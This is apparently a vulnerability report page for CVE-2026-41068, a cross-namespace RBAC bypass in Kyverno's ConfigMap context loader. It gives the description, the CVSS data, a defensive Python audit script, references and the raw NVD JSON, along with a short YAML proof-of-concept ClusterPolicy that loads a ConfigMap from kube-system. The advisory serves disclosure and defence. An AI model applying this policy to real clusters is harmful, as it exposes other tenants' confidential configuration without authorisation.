Security Vulnerability Report
CVE-2026-41068 CVSS 7.7 HIGH

Published: 2026-04-24 04:16:20
Last Modified: 2026-04-27 17:48:05

Description

Kyverno is a policy engine designed for cloud native platform engineering teams. The patch for CVE-2026-22039 fixed cross-namespace privilege escalation in Kyverno's `apiCall` context by validating the `URLPath` field. However, the ConfigMap context loader has the identical vulnerability: the `configMap.namespace` field accepts any namespace with zero validation, allowing a namespace admin to read ConfigMaps from any namespace using Kyverno's privileged service account. This is a complete RBAC bypass in multi-tenant Kubernetes clusters. An updated fix is available in version 1.17.2.
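For clusters still running a version below 1.17.2, the following added example (not code from Kyverno or from the advisory) audits existing namespaced Policy objects for `configMap` context entries that name a namespace other than the Policy's own. It goes slightly beyond the description by also reporting templated and missing namespace values for manual review. It assumes the input is the JSON printed by `kubectl get policies.kyverno.io -A -o json`; the function name and all sample objects are hypothetical.

```python
import json

# Constructed sample shaped like `kubectl get policies.kyverno.io -A -o json`.
# All policy, rule and namespace names below are made up for illustration.
def _policy(name, ns, cm_ns):
    ctx = {"name": "cfg", "configMap": {"name": "settings", "namespace": cm_ns}}
    return {"kind": "Policy", "metadata": {"name": name, "namespace": ns},
            "spec": {"rules": [{"name": "r1", "context": [ctx]}]}}

SAMPLE = json.dumps({"items": [
    _policy("same-ns", "team-a", "team-a"),
    _policy("cross-ns", "team-a", "kube-system"),
    _policy("templated", "team-b", "{{ request.object.metadata.labels.src }}"),
]})


def audit_configmap_contexts(policy_list_json):
    """Report namespaced Policies whose configMap context does not name
    the Policy's own namespace (hypothetical helper, not a Kyverno API)."""
    findings = []
    for pol in json.loads(policy_list_json).get("items", []):
        if pol.get("kind") != "Policy":  # only namespaced Policy objects
            continue
        meta = pol.get("metadata", {})
        own_ns = meta.get("namespace", "")
        for rule in pol.get("spec", {}).get("rules") or []:
            for entry in rule.get("context") or []:
                cm = entry.get("configMap")
                if not cm:
                    continue  # other context types, e.g. apiCall
                target = str(cm.get("namespace") or "").strip()
                if target == own_ns:
                    continue
                if not target:
                    verdict = "unspecified"
                elif "{{" in target:
                    verdict = "dynamic"  # resolved per request; review by hand
                else:
                    verdict = "cross-namespace"
                findings.append({
                    "policy": f"{own_ns}/{meta.get('name')}",
                    "rule": rule.get("name"),
                    "configMap": f"{target}/{cm.get('name')}",
                    "verdict": verdict,
                })
    return findings


if __name__ == "__main__":
    for finding in audit_configmap_contexts(SAMPLE):
        print(finding)
```

A finding is a prompt to check who authored the Policy and whether they hold read access to the target namespace; the remediation stated above remains upgrading to 1.17.2.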

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kyverno:kyverno:*:-:*:*:*:*:*:* - VULNERABLE
Kyverno < 1.17.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: cve-2026-41068-poc
spec:
  validationFailureAction: Audit
  background: false
  rules:
    - name: leak-sensitive-config
      match:
        resources:
          kinds:
            - Pod
      context:
        # Vulnerability: The namespace field is not validated against the user's RBAC.
        # This attempts to load a configmap from a restricted namespace (e.g., kube-system)
        - name: leaked-data
          configMap:
            name: sensitive-config
            namespace: kube-system
      validate:
        message: "PoC: Triggering context loading to bypass RBAC."
        pattern:
          spec: {}

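References

https://github.com/kyverno/kyverno/commit/bbf3e5c01391d612968440659028ae98e565a777 (Patch)
https://github.com/kyverno/kyverno/security/advisories/GHSA-cvq5-hhx3-f99p (Exploit, Vendor Advisory)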

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41068", "sourceIdentifier": "[email protected]", "published": "2026-04-24T04:16:19.950", "lastModified": "2026-04-27T17:48:04.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kyverno is a policy engine designed for cloud native platform engineering teams. The patch for CVE-2026-22039 fixed cross-namespace privilege escalation in Kyverno's `apiCall` context by validating the `URLPath` field. However, the ConfigMap context loader has the identical vulnerability \u2014 the `configMap.namespace` field accepts any namespace with zero validation, allowing a namespace admin to read ConfigMaps from any namespace using Kyverno's privileged service account. This is a complete RBAC bypass in multi-tenant Kubernetes clusters. An updated fix is available in version 1.17.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kyverno:kyverno:*:-:*:*:*:*:*:*", "versionEndExcluding": "1.17.2", "matchCriteriaId": "6574A7FA-CE7D-4EB6-B036-044E07DB453A"}]}]}], "references": [{"url": "https://github.com/kyverno/kyverno/commit/bbf3e5c01391d612968440659028ae98e565a777", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-cvq5-hhx3-f99p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-cvq5-hhx3-f99p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}